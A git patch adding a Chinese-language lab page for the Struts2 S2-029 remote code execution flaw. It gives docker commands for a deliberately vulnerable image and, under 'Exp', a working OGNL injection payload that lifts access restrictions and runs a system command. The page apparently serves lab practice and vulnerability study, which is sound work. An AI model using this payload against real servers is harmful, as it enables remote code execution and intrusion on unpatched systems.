From 41a1aa1773c9190d27771409f376dffc0304cc75 Mon Sep 17 00:00:00 2001
From: Medicean <Medici.Yan@Gmail.com>
Date: Wed, 1 Nov 2017 23:20:34 +0800
Subject: [PATCH] =?UTF-8?q?(Add=20Vul:=20Struts2)=20Struts2=20=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?(S2-029)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 _posts/2017-06-13-s_struts2_s2-029.md | 53 +++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 _posts/2017-06-13-s_struts2_s2-029.md

diff --git a/_posts/2017-06-13-s_struts2_s2-029.md b/_posts/2017-06-13-s_struts2_s2-029.md
new file mode 100644
index 0000000..ca73d74
--- /dev/null
+++ b/_posts/2017-06-13-s_struts2_s2-029.md
@@ -0,0 +1,53 @@
+---
+layout: post
+title: "Struts2 远程代码执行漏洞(S2-029)"
+date: 2017-06-13 18:44:00 +0800
+image: '/assets/img/'
+description: 'Struts2 远程代码执行漏洞(S2-029)环境'
+main-class: 'hole'
+color: '#B31917'
+tags:
+- Struts2
+- RCE
+categories:
+- Struts2
+twitter_text: 'Struts2 远程代码执行漏洞(S2-029)环境'
+introduction: 'Struts2 远程代码执行漏洞(S2-029)环境'
+---
+
+### 漏洞信息
+
+ * [S2-029 公告](http://struts.apache.org/docs/s2-029.html)
+ 
+ 详细参考 [http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html](http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html)
+
+### 获取环境:
+
+1. 拉取镜像到本地
+ ```bash
+$ docker pull medicean/vulapps:s_struts2_s2-029
+ ```
+
+2. 启动环境
+ ```bash
+$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029
+ ```
+ > `-p 80:8080` 前面的 80 代表物理机的端口，可随意指定。 
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`
+
+#### Exp
+
+命令执行
+
+```
+(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))
+```
+
+![](https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-029/s2-029-1.png)
+
+### 其它
+
+感谢 [@zerokeeper](https://github.com/zerokeeper) 贡献